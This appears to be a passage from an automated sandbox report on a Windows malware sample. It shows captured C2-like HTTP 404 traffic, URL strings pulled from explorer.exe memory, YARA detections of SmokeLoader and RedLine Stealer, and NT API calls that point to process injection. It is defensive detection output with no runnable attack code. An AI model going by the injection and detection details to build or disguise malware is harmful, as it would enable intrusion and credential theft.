2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:56:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1762412862.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1764601072.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1761761015.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1767121349.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1759947795.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1759297715.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1763031463.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1763031463.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1767121349.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\1HGXcC63iu.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
